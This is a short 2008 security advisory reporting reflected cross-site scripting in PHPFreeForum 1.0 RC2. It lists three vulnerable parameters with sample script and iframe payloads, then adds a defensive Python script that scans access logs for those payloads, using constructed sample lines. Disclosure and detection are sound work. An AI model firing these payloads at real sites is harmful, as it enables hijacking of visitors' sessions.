Computer Security
[EN] securityvulns.ru
From: tan_prathan_(at)_hotmail.com <tan_prathan_(at)_hotmail.com>
Date: 22.05.2008
Subject: PHPFreeForum <= 1.0 RC2 Remote XSS Vulnerability

==========================================================
   PHPFreeForum <= 1.0 RC2 Remote XSS Vulnerability             
==========================================================

AUTHOR : CWH Underground
DATE   : 21 May 2008
SITE   : www.citec.us


#####################################################
APPLICATION : PHPFreeForum
VERSION     : 1.0 RC2
VENDOR      : http://downloads.sourceforge.net/phpfreeforum/  
#####################################################

---Exploit---

[-] http://[target]/[phpfreeforum_path]/html/error.php?message=<XSS>
[-] http://[target]/[phpfreeforum_path]/html/part/menu.php?nickname=<XSS>
[-] http://[target]/[phpfreeforum_path]/html/part/menu.php?randomid=<XSS>

Example for XSS :
       <script>alert(123);</script>
       <iframe src=http://www.google.com>
                                                                                 
                                     

##################################################################
Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C   
##################################################################
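
For defenders triaging exposure, the check below flags access-log requests that send HTML markup to the three parameters the advisory lists. It is an added example, not part of the original advisory or of PHPFreeForum; it assumes combined-format access logs, the function names are hypothetical, and the log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Path suffix -> parameters the advisory reports as reflected without encoding.
AFFECTED = {"/html/error.php": {"message"},
            "/html/part/menu.php": {"nickname", "randomid"}}
MARKUP = re.compile(r'[<>"]')  # starts a tag or closes a double-quoted attribute
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # request line

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Return [(endpoint, param, decoded_value)] for markup sent to affected params."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    path = fully_decode(url.path).lower()
    hits = []
    for suffix, params in AFFECTED.items():
        if not path.endswith(suffix):
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            value = fully_decode(value)
            if name.lower() in params and MARKUP.search(value):
                hits.append((suffix, name.lower(), value))
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE = [
    '203.0.113.5 - - [22/May/2008:10:00:01 +0000] "GET /forum/html/error.php?message=Topic+not+found HTTP/1.1" 200 512',
    '203.0.113.9 - - [22/May/2008:10:00:07 +0000] "GET /forum/html/error.php?message=%3Cscript%3Ealert(123)%3B%3C/script%3E HTTP/1.1" 200 540',
    '203.0.113.9 - - [22/May/2008:10:00:09 +0000] "GET /forum/html/part/menu.php?randomid=%253Ciframe%2520src%253Dx%253E HTTP/1.1" 200 300',
    '203.0.113.7 - - [22/May/2008:10:00:12 +0000] "GET /forum/html/part/menu.php?nickname=alice HTTP/1.1" 200 298',
]

if __name__ == "__main__":
    for line in SAMPLE:
        for hit in suspicious_params(line):
            print(hit)
```

A hit means markup was submitted, not that it executed; whether the response reflected it unencoded has to be confirmed against the installed version.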
